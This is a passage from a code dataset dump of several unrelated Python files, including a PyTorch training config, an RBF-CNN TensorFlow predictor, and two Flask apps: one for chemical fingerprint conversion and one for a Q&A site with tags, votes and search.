torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n#number of frames to train on\nN = 32\n#batch size\nbatch = 3\n#number of input features\nin_features = 2\n#number of output features\nout_features = 2\n#filter width\nresolution = 64\n#number of layers\nlayers = 3\n#drop out\ndp = True\n#perceptual loss weight\nalpha = 0.04\n#mean absolute error weight\nbeta = 1\n#learning rate\nlr = 0.0003\n#number of training epochs\nnepoch = 100\n#interval at which to save checkpoint networks\nsave_interval = 20\n#save directory\ndirectory = 'trainedNetwork/'+datetime.now().strftime(\"%d%b_%I%M%P\") + '/'\n#name of final network to save\nsave_directory = 'residual_booster_network'\n#pre-train network with gated variant\npretrain = '../gated/trainedNetwork/12Jul_0749pm/residual_booster_network.h5'\n\nif not os.path.exists(directory):\n os.makedirs(directory)\n\nparameters = {'N':N, 'batch':batch, 'in_features':in_features,'out_features':out_features,'resolution':resolution, 'layers':layers,'dp':dp,'save_directory':save_directory}\n\nwith open(directory+'parameters.pkl','wb') as f:\n pickle.dump(parameters,f)\n\nresidual_booster_network(N,batch,in_features,out_features,resolution,layers,dp,alpha,beta,lr,nepoch,save_interval,directory,save_directory,pretrain,device)\n","sub_path":"ungated/train_network.py","file_name":"train_network.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"44648009","text":"from __future__ import print_function\nfrom PIL import Image\nimport pickle\nimport sys\n\nwith open('trained_clf.p', 'rb') as f:\n clf = pickle.load(f)\n\ndef judge(fname):\n img = Image.open(fname)\n img = img.resize((128, 128))\n img = img.convert('L')\n data = list(img.getdata())\n\n return 10 ** clf.predict([data])[0]\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('Usage: {} file_path'.format(sys.argv[0]))\n exit(1)\n\n print(judge(sys.argv[1]))\n","sub_path":"rating_machine/judge.py","file_name":"judge.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"421720383","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 10 16:52:08 2019\n\n@author: \n Jan Brekelmans\n j.j.w.c.brekelmans@gmail.com\n\"\"\"\n\nimport functions\nimport numpy as np\n\ndef compute():\n index = 10001\n \n n = functions.prime_upper_bound(index)\n \n primes = functions.prime_sieve(n)\n \n return str(primes[index-1])\n \n \nif __name__ == \"__main__\":\n print(compute())","sub_path":"Python/projectEuler007.py","file_name":"projectEuler007.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"250764254","text":"print(\"STACK IMPLEMENTATION\")\nstack= []\nwhile True:\n print(\"What you want to perform? 
\\n 1.Insert an element,2.Remove an element,3.Check size of stack,4.Emptiness of stack,5.EXIT\")\n    n = int(input())\n    if n == 1:\n        print(\"Enter the element you want to insert:\")\n        l = input()\n        stack.append(l)\n        print(\"Elements in stack are:\",stack)\n    elif n == 2:\n        if stack==[]:\n            print(\"Empty stack. You cannot delete!!\")\n        else:\n            stack.pop()\n            print(\"Elements in stack are:\",stack)\n    elif n==3:\n        print(\"Size of stack is:\",len(stack))\n        \n    elif n==4:\n        if stack==[]:\n            print(\"Your stack is Empty!!\")\n        else:\n            print(\"You have\",len(stack),\"elements in your stack\")\n        \n    elif n==5:\n        print(\"Exit\")\n        break\n","sub_path":"stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
+{"seq_id":"274850199","text":"import numpy as np\nimport tensorflow as tf\nfrom scipy.interpolate import interp2d\n\n\nclass CNN_predict():\n    def __init__(self, model, scale_cnn, trial, pool_size, rbf_models):\n        self.scale_cnn = scale_cnn\n        self.trial = trial\n        self.model = model\n        self.pool_size = pool_size\n        self.rbf_models = rbf_models\n\n    def rbf_map(self, X, num_centr, centroids, radius):\n        hmap_list = []\n        s = X.shape\n        d1 = np.transpose(np.tile(np.expand_dims(X, axis=0), [num_centr, 1, 1]), [1, 0, 2]) - np.tile(\n            np.expand_dims(centroids, axis=0), [s[0], 1, 1])\n        d = np.sqrt(np.power(np.multiply(d1, np.tile(np.expand_dims(radius, axis=0), [s[0], 1, 1])), 2))\n        phi = np.exp((-1) * np.power(d, 2))\n\n        return np.transpose(phi, [1, 0, 2])\n\n    def rescale(self, arr, nrows, ncol):\n        W, H = arr.shape\n        new_W, new_H = (nrows, ncol)\n        xrange = lambda x: np.linspace(0, 1, x)\n\n        f = interp2d(xrange(H), xrange(W), arr, kind=\"linear\")\n        new_arr = f(xrange(new_H), xrange(new_W))\n\n        return new_arr\n\n    def create_inputs(self, X_train):\n        self.N, self.D = X_train.shape\n\n        H = []\n\n        self.depth = len(self.rbf_models)\n\n        self.num_centr = self.model['num_centr']\n\n        for i in range(self.depth):\n            if len(self.rbf_models[i]['Radius'].shape) == 1:\n                self.rbf_models[i]['Radius'] = np.tile(self.rbf_models[i]['Radius'].reshape(1, -1), [self.num_centr, 1])\n\n            if self.rbf_models[i]['centroids'].shape[0] != self.num_centr:\n                centroids = self.rescale(self.rbf_models[i]['centroids'], self.num_centr, self.D)\n            else:\n                centroids = self.rbf_models[i]['centroids']\n            if np.isscalar(self.rbf_models[i]['Radius']):\n                Radius = self.rbf_models[i]['Radius']\n            elif self.rbf_models[i]['Radius'].shape[0] == self.num_centr:\n                Radius = self.rbf_models[i]['Radius']\n            else:\n                Radius = self.rescale(self.rbf_models[i]['Radius'], self.num_centr, self.D)\n\n            H.append(np.transpose(self.rbf_map(X_train, self.num_centr, centroids, Radius), [1, 2, 0]))\n            H[i] = np.array(H[i])\n            H[i] = H[i].reshape(-1, self.D * self.num_centr)\n            sc = self.scale_cnn[i]\n            H[i] = sc.transform(H[i].reshape(-1, self.D * self.num_centr))\n            H[i] = np.nan_to_num(H[i].reshape(-1, self.D, self.num_centr))\n\n        H = np.transpose(np.stack(H), [1, 2, 3, 0])\n\n        return H\n\n    def init_weights(self, init_w):\n        init_random_dist = tf.convert_to_tensor(init_w)\n        return tf.Variable(init_random_dist)\n\n    def init_bias(self, init_b):\n        init_bias_vals = tf.convert_to_tensor(init_b)\n        return tf.Variable(init_bias_vals)\n\n    def normal_full_layer(self, input_layer, init_w, init_b):\n\n        W = self.init_weights(init_w)\n        b = self.init_bias(init_b)\n        return tf.add(tf.matmul(input_layer, W), b, name='prediction'), W, b\n\n    def build_graph(self, x1, best_weights, kernels, h_size, 
hold_prob, filters):\n\n with tf.name_scope(\"build_rbf_cnn\") as scope:\n\n if self.trial == 0:\n convo_1 = tf.keras.layers.Conv2D(filters=int(filters),\n kernel_size=kernels,\n padding=\"same\",\n name='cnn1',\n activation=tf.nn.elu)\n\n convo_1_pool = tf.keras.layers.AveragePooling2D(pool_size=self.pool_size, strides=1,\n name='pool1')\n cnn_output = convo_1_pool(convo_1(x1))\n full_one_dropout = tf.nn.dropout(cnn_output, rate=1 - hold_prob)\n shape = full_one_dropout.get_shape().as_list()\n s = shape[1] * shape[2] * shape[3]\n convo_2_flat = tf.reshape(full_one_dropout, [-1, s])\n\n elif self.trial == 1:\n convo_1 = tf.keras.layers.Conv3D(filters=int(filters),\n kernel_size=kernels,\n padding=\"same\",\n name='cnn1',\n activation=tf.nn.elu)\n\n convo_1_pool = tf.keras.layers.AveragePooling3D(pool_size=self.pool_size, strides=1,\n name='pool1')\n cnn_output = convo_1_pool(convo_1(tf.expand_dims(x1, axis=4)))\n full_one_dropout = tf.nn.dropout(cnn_output, rate=1 - hold_prob)\n shape = full_one_dropout.get_shape().as_list()\n s = shape[1] * shape[2] * shape[3] * shape[4]\n convo_2_flat = tf.reshape(full_one_dropout, [-1, s])\n\n elif self.trial == 2:\n convo_1 = tf.keras.layers.Conv3D(filters=int(filters),\n kernel_size=kernels,\n padding=\"same\",\n name='cnn1',\n activation=tf.nn.elu)\n\n convo_1_pool = tf.keras.layers.AveragePooling3D(pool_size=self.pool_size, strides=1,\n name='pool1')\n cnn_1 = convo_1_pool(convo_1(tf.expand_dims(x1, axis=4)))\n full_one_dropout = tf.nn.dropout(cnn_1, rate=1 - hold_prob)\n shape = full_one_dropout.get_shape().as_list()\n convo_1_flat = tf.reshape(full_one_dropout, [-1, shape[1], shape[2] * shape[3], shape[4]])\n\n convo_2 = tf.keras.layers.Conv2D(filters=int(filters),\n kernel_size=kernels[:-1],\n padding=\"same\",\n name='cnn2',\n activation=tf.nn.elu)\n\n convo_2_pool = tf.keras.layers.AveragePooling2D(pool_size=self.pool_size[:-1], strides=1,\n name='pool2')\n cnn_output = convo_2_pool(convo_2(convo_1_flat))\n full_two_dropout = tf.nn.dropout(cnn_output, rate=1 - hold_prob)\n shape = full_two_dropout.get_shape().as_list()\n s = shape[1] * shape[2] * shape[3]\n convo_2_flat = tf.reshape(full_two_dropout, [-1, s])\n elif self.trial == 3:\n convo_1 = tf.keras.layers.Conv3D(filters=int(filters),\n kernel_size=kernels,\n padding=\"same\",\n name='cnn1',\n activation=tf.nn.elu)\n\n convo_1_pool = tf.keras.layers.AveragePooling3D(pool_size=self.pool_size, strides=1,\n name='pool1')\n cnn_1 = convo_1_pool(convo_1(tf.expand_dims(x1, axis=4)))\n full_one_dropout = tf.nn.dropout(cnn_1, rate=1 - hold_prob)\n shape = full_one_dropout.get_shape().as_list()\n s = shape[1] * shape[2] * shape[3] * shape[4]\n convo_1_flat = tf.reshape(full_one_dropout, [-1, s], name='reshape1')\n\n full_layer_middle = tf.keras.layers.Dense(units=2000, activation=tf.nn.elu, name='dense_middle')\n full_middle_dropout = tf.nn.dropout(full_layer_middle(convo_1_flat), rate=1 - hold_prob)\n full_middle_dropout = tf.reshape(full_middle_dropout, [-1, 10, 20, 10], name='reshape2')\n\n convo_2 = tf.keras.layers.Conv2D(filters=int(filters),\n kernel_size=kernels[:-1],\n padding=\"same\",\n name='cnn2',\n activation=tf.nn.elu)\n\n convo_2_pool = tf.keras.layers.AveragePooling2D(pool_size=self.pool_size[:-1], strides=1,\n name='pool2')\n cnn_output = convo_2_pool(convo_2(full_middle_dropout))\n full_two_dropout = tf.nn.dropout(cnn_output, rate=1 - hold_prob)\n shape = full_two_dropout.get_shape().as_list()\n s = shape[1] * shape[2] * shape[3]\n convo_2_flat = tf.reshape(full_two_dropout, [-1, 
s])\n\n full_layer_one = tf.keras.layers.Dense(units=h_size[0], activation=tf.nn.elu, name='dense1')\n\n full_layer_two = tf.keras.layers.Dense(units=h_size[1], activation=tf.nn.elu, name='dense2')\n full_two_dropout = tf.nn.dropout(full_layer_one(convo_2_flat), keep_prob=hold_prob)\n dense_output = tf.nn.dropout(full_layer_two(full_two_dropout), keep_prob=hold_prob)\n\n y_pred, W, b = self.normal_full_layer(dense_output, best_weights['build_rbf_cnn/Variable:0'],\n best_weights['build_rbf_cnn/Variable_1:0'])\n if self.trial == 1 or self.trial == 0:\n weights = convo_1.trainable_weights + full_layer_one.trainable_weights + full_layer_two.trainable_weights + [\n W, b]\n return y_pred, weights, convo_1, full_layer_one, full_layer_two\n elif self.trial == 2:\n weights = convo_1.trainable_weights + convo_2.trainable_weights + full_layer_one.trainable_weights + full_layer_two.trainable_weights + [\n W, b]\n return y_pred, weights, convo_1, convo_2, full_layer_one, full_layer_two\n else:\n weights = convo_1.trainable_weights + full_layer_middle.trainable_weights + convo_2.trainable_weights + full_layer_one.trainable_weights + full_layer_two.trainable_weights + [\n W, b]\n return y_pred, weights, convo_1, convo_2, full_layer_middle, full_layer_one, full_layer_two\n\n def predict(self, X):\n filters = self.model['filters']\n kernels = self.model['kernels']\n h_size = self.model['h_size']\n best_weights = self.model['best_weights']\n H = self.create_inputs(X)\n\n tf.compat.v1.reset_default_graph()\n graph_cnn = tf.Graph()\n with graph_cnn.as_default():\n with tf.device(\"/cpu:0\"):\n x1 = tf.compat.v1.placeholder('float', shape=[None, self.D, self.num_centr, self.depth],\n name='input_data')\n hold_prob = tf.compat.v1.placeholder(tf.float32, name='drop')\n with tf.device(\"/cpu:0\"):\n\n if self.trial == 1 or self.trial == 0:\n y_pred_, weights, convo_1, full_layer_one, full_layer_two = self.build_graph(x1, best_weights,\n kernels, h_size,\n hold_prob, filters)\n elif self.trial == 2:\n y_pred_, weights, convo_1, convo_2, full_layer_one, full_layer_two = self.build_graph(x1,\n best_weights,\n kernels,\n h_size,\n hold_prob,\n filters)\n else:\n y_pred_, weights, convo_1, convo_2, full_layer_middle, full_layer_one, full_layer_two = self.build_graph(\n x1, best_weights, kernels, h_size, hold_prob, filters)\n\n config_tf = tf.compat.v1.ConfigProto(allow_soft_placement=True)\n config_tf.gpu_options.allow_growth = True\n\n with tf.compat.v1.Session(graph=graph_cnn, config=config_tf) as sess:\n print('Open an rbf-cnn network with %s' % self.num_centr)\n\n sess.run(tf.compat.v1.global_variables_initializer())\n if self.trial == 1 or self.trial == 0:\n convo_1.set_weights(\n [best_weights['build_rbf_cnn/cnn1/kernel:0'], best_weights['build_rbf_cnn/cnn1/bias:0']])\n elif self.trial == 2:\n convo_1.set_weights(\n [best_weights['build_rbf_cnn/cnn1/kernel:0'], best_weights['build_rbf_cnn/cnn1/bias:0']])\n convo_2.set_weights(\n [best_weights['build_rbf_cnn/cnn2/kernel:0'], best_weights['build_rbf_cnn/cnn2/bias:0']])\n else:\n convo_1.set_weights(\n [best_weights['build_rbf_cnn/cnn1/kernel:0'], best_weights['build_rbf_cnn/cnn1/bias:0']])\n convo_2.set_weights(\n [best_weights['build_rbf_cnn/cnn2/kernel:0'], best_weights['build_rbf_cnn/cnn2/bias:0']])\n full_layer_middle.set_weights(\n [best_weights['build_rbf_cnn/dense_middle/kernel:0'],\n best_weights['build_rbf_cnn/dense_middle/bias:0']])\n\n full_layer_one.set_weights(\n [best_weights['build_rbf_cnn/dense1/kernel:0'], 
best_weights['build_rbf_cnn/dense1/bias:0']])\n full_layer_two.set_weights(\n [best_weights['build_rbf_cnn/dense2/kernel:0'], best_weights['build_rbf_cnn/dense2/bias:0']])\n\n y_pred, weights_run = sess.run([y_pred_, weights],\n feed_dict={x1: H, hold_prob: 1})\n\n sess.close()\n\n return y_pred\n","sub_path":"Fuzzy_clustering/version2/deep_models/cnn_predict.py","file_name":"cnn_predict.py","file_ext":"py","file_size_in_byte":14206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"115900726","text":"from flask import Flask\nfrom flask import render_template, request\nfrom form import *\n\nfrom predict.views import *\nfrom convert.views import *\nfrom werkzeug.utils import secure_filename\n\nUPLOAD_FOLDER = 'uploads'\nALLOWED_EXTENSIONS = {'csv'}\njpype.addClassPath('cdk-2.3.jar')\nstartJVM(getDefaultJVMPath(), \"-ea\")\n\n\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n# @app.route('/')\n# def base():\n# return render_template('base.html')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n\n@app.route('/base')\ndef base():\n return render_template('base.html')\n\n\n\n@app.route('/predict', methods = ['POST', 'GET'])\ndef predict():\n form = PredictForm()\n\n if request.method == 'POST':\n\n result = request.form\n smiles = result.get('smiles')\n alt = int(result.get('al_fingerprint'))\n print(alt)\n PCE = RegressionPredit(smiles, alt)\n print(PCE)\n # message = []\n # message.append(PCE)\n # print(smiles)\n # print(type(result))\n # print(result)\n return render_template(\"predict.html\", form=form, result= PCE)\n\n return render_template('predict.html', form=form)\n\n\n# @app.route('/result',methods = ['POST', 'GET'])\n# def result():\n# if request.method == 'POST':\n# result = request.form\n# return render_template(\"result.html\",result = result)\n\n\n\n\n@app.route('/convert', methods = ['POST', 'GET'])\ndef convert():\n form = ConvertForm()\n if request.method == 'POST':\n result = request.form\n #print(request.files)\n try:\n if result.get('smiles') != None:\n f_func = FingerprintType(int(result.get('fingerprint')))\n SingleSmilesConvert(f_func, result.get('smiles'), savename='csv/fingerprint.csv')\n\n return send_file('csv/fingerprint.csv', mimetype='text/csv',\n as_attachment=True, attachment_filename=\"fingerprint.csv\")\n\n\n elif request.files != None:\n request.files.get('file').save('uploads/fingerprint.csv')\n file = 'uploads/fingerprint.csv'\n print(result.get('fingerprint'))\n f_func = FingerprintType(int(result.get('fingerprint')))\n FileSmilesConvert(f_func, namecol=1, PCEcol=2, smilescol=3, filename='uploads/fingerprint.csv', savename='csv/file_fingerprint.csv')\n return send_file('csv/file_fingerprint.csv', mimetype='text/csv',\n as_attachment=True, attachment_filename=\"file_fingerprint.csv\")\n except:\n pass\n return render_template('convert.html',form=form)\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n\n#\n# @app.route('/')\n# def hello_world():\n# return 'Hello World!'\nimport os\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n #startJVM(getDefaultJVMPath(), \"-ea\")\n app.config.from_mapping(\n SECRET_KEY='dev',\n # DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),\n )\n\n if test_config is None:\n # load the instance config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test 
config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n # a simple page that says hello\n # @app.route('/')\n # def hello():\n # return 'Hello, World!'\n\n # from . import db\n # db.init_app(app)\n #\n # from . import auth\n # app.register_blueprint(auth.bp)\n #\n # from . import blog\n # app.register_blueprint(blog.bp)\n # app.add_url_rule('/', endpoint='index')\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"163661976","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for\n)\nfrom werkzeug.exceptions import abort\nfrom flask_paginate import Pagination, get_page_args\nfrom flaskr.auth import login_required\nfrom flaskr.db import get_db\nimport time\nfrom . import ESsearch\n\nbp = Blueprint('question', __name__)\n\ndef get_posts(offset=0, per_page=12,posts=[]):\n return posts[offset: offset + per_page]\n\n@bp.route('/')\ndef index():\n page, per_page, offset = get_page_args(page_parameter='page',\n per_page_parameter='per_page')\n db=get_db()\n posts = db.execute(\n 'SELECT *'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' ORDER BY created DESC'\n ).fetchall()\n total=len(posts)\n pagination_posts = get_posts(offset=offset, per_page=per_page,posts=posts)\n pagination = Pagination(page=page, per_page=per_page, total=total,\n css_framework='bootstrap4')\n return render_template('question/index.html',posts=pagination_posts,\n page=page,\n per_page=per_page,\n pagination=pagination,)\n\n\n@bp.route('/create', methods=('GET', 'POST'))\n@login_required\ndef create():\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n tag=request.form['tag']\n #print tag\n tags=tag.split(',')\n # s=string(tag)\n # print s\n error = None\n searchobj = ESsearch.ESearch()\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n db = get_db()\n db.execute(\n 'INSERT INTO post (author_id,title,body)'\n ' VALUES (?, ?, ?)',\n ( g.user['id'],title, body)\n )\n x=db.execute( 'SELECT max(qid) as maximum FROM post').fetchone()\n data=db.execute(\"SELECT * FROM user WHERE id = ?\", (g.user['id'],)).fetchone()\n lastid = int(x[0])\n tdata = db.execute(\"SELECT * from post where qid = ?\",(lastid,)).fetchone()\n searchobj.insert(int(tdata[0]), int(tdata[1]), tdata[2], int(tdata[3]), tdata[4], tdata[5], tdata[6])\n \n flag=0\n if(data[5]>5) and tags is not None:\n for i in tags:\n db.execute(\n 'INSERT INTO qtags (tagname,qid)'\n ' VALUES (?, ?)',\n (i,x[0])\n )\n r=db.execute(\"SELECT * FROM tags WHERE tagname = ?\", (i,)).fetchone()\n if(r is None):\n db.execute(\n 'INSERT INTO tags (tagname)'\n ' VALUES (?)',\n (i,)\n )\n db.execute('INSERT INTO TagDescription (tagname)'\n 'VALUES (?)',\n (i,))\n\n else:\n for i in tags:\n data=db.execute(\"SELECT * FROM tags WHERE tagname = ?\", (i,)).fetchone()\n if(data is None):\n flag=1\n break\n else:\n continue\n if(flag==0):\n for i in tags:\n db.execute(\n 'INSERT INTO qtags (tagname,qid)'\n ' VALUES (?, ?)',\n (i,x[0])\n )\n else:\n print (\"NO REPUTATION TO ADD TAGS\")\n\n # print x['qid']\n #print x[0]\n \n db.commit()\n return redirect(url_for('question.index'))\n\n return render_template('question/create.html')\n\ndef get_question(id, 
check_author=True):\n post = get_db().execute(\n 'SELECT qid, title, body, created, author_id, username'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' WHERE qid = ?',\n (id,)\n ).fetchone()\n\n if post is None:\n abort(404, \"Post id {0} doesn't exist.\".format(id))\n\n if check_author and post['author_id'] != g.user['id']:\n abort(403)\n\n return post\n\n@bp.route('//update', methods=('GET', 'POST'))\n@login_required\ndef update(id):\n post = get_question(id)\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n searchobj = ESsearch.ESearch()\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n db = get_db()\n db.execute(\n 'UPDATE post SET title = ?, body = ?'\n ' WHERE qid = ?',\n (title, body, id)\n )\n db.commit()\n lastid = int(id)\n tdata = db.execute(\"SELECT * from post where qid = ?\",(lastid,)).fetchone()\n searchobj.insert(int(tdata[0]), int(tdata[1]), tdata[2], int(tdata[3]), tdata[4], tdata[5], tdata[6])\n \n return redirect(url_for('question.index'))\n\n return render_template('question/update.html', post=post)\n\n@bp.route('/search', methods=('POST','GET'))\ndef search():\n print(request.method)\n if request.method == 'GET':\n page, per_page, offset = get_page_args(page_parameter='page',\n per_page_parameter='per_page')\n db=get_db() \n pattern = request.args.get('tagname')\n print(pattern)\n if len(pattern)>0:\n newpat = str(pattern)\n tdata = db.execute(\"SELECT * from qtags where tagname = ?\",(newpat,)).fetchall()\n posts = []\n for item in tdata:\n resp = db.execute(\n 'SELECT qid, title, body, created, author_id, username,profile_picture'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' WHERE p.qid = ?', (int(item[1]),)\n ).fetchall()\n for items in resp:\n posts.append(items)\n \n total=len(posts) \n pagination_posts = get_posts(offset=offset, per_page=per_page,posts=posts)\n pagination = Pagination(page=page, per_page=per_page, total=total,\n css_framework='bootstrap4')\n return render_template('question/index.html',posts=pagination_posts,\n page=page,\n per_page=per_page,\n pagination=pagination,)\n else:\n return \"Something wrong with the tag name!\"\n\n if request.method == 'POST':\n\n page, per_page, offset = get_page_args(page_parameter='page',\n per_page_parameter='per_page')\n db=get_db() \n pattern = request.form['pattern']\n if len(pattern)>0:\n if(pattern[0] == '[' and pattern[len(pattern)-1] == ']'):\n pattern = pattern[1:(len(pattern)-1)]\n newpat = ''.join(pattern)\n tdata = db.execute(\"SELECT * from qtags where tagname = ?\",(newpat,)).fetchall()\n posts = []\n for item in tdata:\n resp = db.execute(\n 'SELECT qid, title, body, created, author_id, username,profile_picture'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' WHERE p.qid = ?', (int(item[1]),)\n ).fetchall()\n for items in resp:\n posts.append(items)\n\n else:\n searchobj = ESsearch.ESearch()\n posts = searchobj.search(pattern)\n\n total=len(posts) \n pagination_posts = get_posts(offset=offset, per_page=per_page,posts=posts)\n pagination = Pagination(page=page, per_page=per_page, total=total,\n css_framework='bootstrap4')\n return render_template('question/index.html',posts=pagination_posts,\n page=page,\n per_page=per_page,\n pagination=pagination,)\n else:\n return \"Please Enter Something to search!\"\n\n else:\n return \"something wrong happened!\"\n\n@bp.route('//delete', methods=('POST',))\n@login_required\ndef delete(id):\n print(\"HI\")\n get_question(id)\n db = 
get_db()\n db.execute('DELETE FROM post WHERE qid = ?', (id,))\n db.commit()\n searchobj = ESsearch.ESearch()\n searchobj.delete(int(id))\n return redirect(url_for('question.index'))\n\n\n@bp.route('//que', methods=('GET','POST'))\ndef que(id):\n db = get_db()\n db = get_db()\n posts=db.execute('SELECT qid, title, body, created, author_id, username, upvotes,profile_picture'\n ' FROM post p JOIN user u ON p.author_id = u.id where qid =?' , (id,)).fetchone()\n tags=db.execute('SELECT * FROM qtags where qid=?',(id,)).fetchall()\n comments=db.execute('SELECT * FROM comment_question WHERE qid=?',(id,)).fetchall()\n ans=db.execute('SELECT * FROM answer a JOIN user u ON a.author_id=u.id WHERE qid = ? ORDER BY a.accepted DESC, upvotes DESC', (id,)).fetchall()\n ans_len=len(ans)\n comments_len=len(comments)\n tag_len=len(tags)\n list1={}\n tag_len=len(tags)\n for i in ans:\n # print \"hello\"\n # print i['id']\n # print \"temp\"\n ans4=db.execute('SELECT * FROM comment_answer WHERE ans_id=?',(i['id'],)).fetchall()\n # print len(ans4)\n list1[i['id']]=ans4\n # print len(list1[i['id']])\n # comments_len_ans=len(ans1)\n return render_template('question/que.html',posts=posts,ans=ans,ans_len=ans_len,comments=comments,comments_len=comments_len,tags=tags,tag_len=tag_len,list1=list1)\n\n\n\n@bp.route('//create_comment', methods=('GET', 'POST'))\n@login_required\ndef create_comment(id):\n if request.method == 'POST':\n body = request.form['body']\n db = get_db()\n db.execute(\n 'INSERT INTO comment_question(qid,author_id,body)'\n ' VALUES (?, ?, ?)',\n (id,g.user['id'], body)\n )\n db.commit()\n return redirect(url_for('question.que',id=id))\n\n return render_template('question/create_comment.html')\n\n\n@bp.route('//upvote_question', methods=('GET', 'POST'))\n@login_required\ndef upvote_question(id):\n db = get_db()\n result=db.execute('select * from upvote_que where qid=? and userid=?',(id,g.user['id'])).fetchone()\n if result is not None:\n if result[2]==2:\n db.execute('UPDATE upvote_que SET upvote_downvote=? WHERE qid = ? and userid=?',(1,id,g.user['id']))\n db.execute('UPDATE post SET upvotes= upvotes + 1 WHERE qid = ?',(id,))\n else:\n db.execute('insert into upvote_que(qid,userid,upvote_downvote) values(?,?,?)',(id,g.user['id'],1)) \n db.execute('UPDATE post SET upvotes=upvotes+1 WHERE qid = ?',(id,))\n db.commit()\n return redirect(url_for('question.que',id=id))\n\n\n@bp.route('//downvote_question', methods=('GET', 'POST'))\n@login_required\ndef downvote_question(id):\n db = get_db()\n result=db.execute('select * from upvote_que where qid=? and userid=?',(id,g.user['id'])).fetchone()\n if result is not None:\n if result[2]==1:\n db.execute('UPDATE upvote_que SET upvote_downvote=? WHERE qid = ? and userid=?',(2,id,g.user['id']))\n db.execute('UPDATE post SET upvotes=(upvotes-1) WHERE qid = ?',(id,))\n else:\n db.execute('insert into upvote_que(qid,userid,upvote_downvote) values(?,?,?)',(id,g.user['id'],2))\n db.execute('UPDATE post SET upvotes=(upvotes-1) WHERE qid = ?',(id,)) \n db.commit()\n return redirect(url_for('question.que',id=id)) \n\n\n@bp.route('//upvote_answer', methods=('GET', 'POST'))\n@login_required\ndef upvote_answer(id):\n db = get_db()\n result=db.execute('select * from upvote_ans where id=? and userid=?',(id,g.user['id'])).fetchone()\n if result is not None:\n if result[2]==2:\n db.execute('UPDATE upvote_ans SET upvote_downvote=? WHERE id = ? 
and userid=?',(1,id,g.user['id']))\n db.execute('UPDATE answer SET upvotes= upvotes + 1 WHERE id = ?',(id,))\n else:\n db.execute('insert into upvote_ans(id,userid,upvote_downvote) values(?,?,?)',(id,g.user['id'],1)) \n db.execute('UPDATE answer SET upvotes=upvotes+1 WHERE id = ?',(id,))\n res=db.execute('select qid from answer where id=?',(id,)).fetchone()\n db.commit()\n return redirect(url_for('question.que',id=res['qid']))\n\n\n@bp.route('//downvote_answer', methods=('GET', 'POST'))\n@login_required\ndef downvote_answer(id):\n db = get_db()\n result=db.execute('select * from upvote_ans where id=? and userid=?',(id,g.user['id'])).fetchone()\n if result is not None:\n if result[2]==1:\n db.execute('UPDATE upvote_ans SET upvote_downvote=? WHERE id = ? and userid=?',(2,id,g.user['id']))\n db.execute('UPDATE answer SET upvotes=(upvotes-1) WHERE id = ?',(id,))\n else:\n db.execute('insert into upvote_ans(id,userid,upvote_downvote) values(?,?,?)',(id,g.user['id'],2))\n db.execute('UPDATE answer SET upvotes=(upvotes-1) WHERE id = ?',(id,)) \n db.commit()\n res=db.execute('select qid from answer where id=?',(id,)).fetchone()\n return redirect(url_for('question.que',id=res['qid'])) \n\n\n@bp.route('//createanswer', methods=('GET', 'POST'))\n@login_required\ndef createanswer(id):\n if request.method == 'POST':\n body = request.form['body']\n db = get_db()\n db.execute(\n 'INSERT INTO answer (qid,author_id,body)'\n ' VALUES (?, ?, ?)',\n (id, g.user['id'], body)\n )\n db.execute(\n 'UPDATE user SET reputation =reputation+1 '\n ' WHERE id = ?',\n (g.user['id'],)\n ) \n db.commit()\n return redirect(url_for(\"question.que\", id=id))\n\n return render_template('question/createanswer.html')\n\n@bp.route('///create_comment_ans', methods=('GET', 'POST'))\n@login_required\ndef create_comment_ans(qid,aid):\n if request.method == 'POST':\n body = request.form['body']\n db = get_db()\n db.execute(\n 'INSERT INTO comment_answer(ans_id,author_id,body)'\n ' VALUES (?, ?, ?)',\n (aid,g.user['id'], body)\n )\n db.commit()\n return redirect(url_for('question.que',id=qid))\n\n return render_template('question/create_comment_ans.html')\n\ndef get_answer(id, check_author=True):\n post = get_db().execute(\n 'SELECT p.id, qid, body, created, author_id, username'\n ' FROM answer p JOIN user u ON p.author_id = u.id'\n ' WHERE p.id = ?',\n (id,)\n ).fetchone()\n\n if post is None:\n abort(404, \"Post id {0} doesn't exist.\".format(id))\n\n if check_author and post['author_id'] != g.user['id']:\n abort(403)\n\n return post\n\n\n@bp.route('//updateanswer', methods=('GET', 'POST'))\n@login_required\ndef updateanswer(id):\n post = get_answer(id)\n\n if request.method == 